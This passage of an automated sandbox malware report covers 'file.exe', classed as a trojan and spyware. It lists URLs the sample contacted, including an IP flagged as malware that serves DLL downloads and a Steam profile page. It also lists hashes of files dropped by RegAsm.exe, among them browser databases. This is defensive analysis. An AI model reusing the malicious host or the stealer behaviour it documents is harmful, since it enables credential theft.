                    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLhRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://ac.ecosia.org/autocomplete?q=HIEBAK.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://95.217.240.101/sqlx.dllIRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgRegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgRegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=englishRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://95.217.240.101/msvcp140.dllyS#RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://store.steampowered.com/account/cookiepreferences/RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    https://store.steampowered.com/mobileRegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drfalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.102.42.29 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
95.217.240.101 | unknown | Germany | 24940 | HETZNER-ASDE | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1443407
Start date and time: 2024-05-17 18:05:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 1s
Hypervisor based Inspection enabled: false
Report type: light
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/27@1/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• TCP Packets have been reduced to 100
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
Time | Type | Description
12:06:06 | API Interceptor | 1x Sleep call for process: RegAsm.exe modified
                    No context
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 159744
Entropy (8bit): 0.5394293526345721
Encrypted: false
SSDEEP: 96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5: 52701A76A821CDDBC23FB25C3FCA4968
SHA1: 440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256: D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512: 2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious: false
Reputation: high, very likely benign file
                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.8439810553697228
Encrypted: false
SSDEEP: 24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5: 9D46F142BBCF25D0D495FF1F3A7609D3
SHA1: 629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256: C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512: AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious: false
Reputation: high, very likely benign file
                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                    Category:dropped
                    Size (bytes):20480
                    Entropy (8bit):0.6732424250451717
                    Encrypted:false
                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                    Malicious:false
                    Reputation:high, very likely benign file
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):155648
                    Entropy (8bit):0.5407252242845243
                    Encrypted:false
                    SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                    MD5:7B955D976803304F2C0505431A0CF1CF
                    SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                    SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                    SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                    Malicious:false
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):51200
                    Entropy (8bit):0.8746135976761988
                    Encrypted:false
                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                    Malicious:false
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                    Category:dropped
                    Size (bytes):9504
                    Entropy (8bit):5.512408163813622
                    Encrypted:false
                    SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                    MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                    SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                    SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                    SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                    Malicious:false
                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):5242880
                    Entropy (8bit):0.03859996294213402
                    Encrypted:false
                    SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                    MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                    SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                    SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                    SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                    Malicious:false
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):32768
                    Entropy (8bit):0.017262956703125623
                    Encrypted:false
                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                    Malicious:false
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):98304
                    Entropy (8bit):0.08235737944063153
                    Encrypted:false
                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                    Malicious:false
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):32768
                    Entropy (8bit):0.017262956703125623
                    Encrypted:false
                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                    Malicious:false
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):685392
                    Entropy (8bit):6.872871740790978
                    Encrypted:false
                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                    MD5:550686C0EE48C386DFCB40199BD076AC
                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):608080
                    Entropy (8bit):6.833616094889818
                    Encrypted:false
                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):450024
                    Entropy (8bit):6.673992339875127
                    Encrypted:false
                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):2046288
                    Entropy (8bit):6.787733948558952
                    Encrypted:false
                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):257872
                    Entropy (8bit):6.727482641240852
                    Encrypted:false
                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                    MD5:4E52D739C324DB8225BD9AB2695F262F
                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):80880
                    Entropy (8bit):6.920480786566406
                    Encrypted:false
                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                    MD5:A37EE36B536409056A86F50E67777DD7
                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):2459136
                    Entropy (8bit):6.052474106868353
                    Encrypted:false
                    SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                    MD5:90E744829865D57082A7F452EDC90DE5
                    SHA1:833B178775F39675FA4E55EAB1032353514E1052
                    SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                    SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):685392
                    Entropy (8bit):6.872871740790978
                    Encrypted:false
                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                    MD5:550686C0EE48C386DFCB40199BD076AC
                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):608080
                    Entropy (8bit):6.833616094889818
                    Encrypted:false
                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):450024
                    Entropy (8bit):6.673992339875127
                    Encrypted:false
                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):2046288
                    Entropy (8bit):6.787733948558952
                    Encrypted:false
                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):257872
                    Entropy (8bit):6.727482641240852
                    Encrypted:false
                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                    MD5:4E52D739C324DB8225BD9AB2695F262F
                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):80880
                    Entropy (8bit):6.920480786566406
                    Encrypted:false
                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                    MD5:A37EE36B536409056A86F50E67777DD7
                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2969), with CRLF, LF line terminators
                    Category:dropped
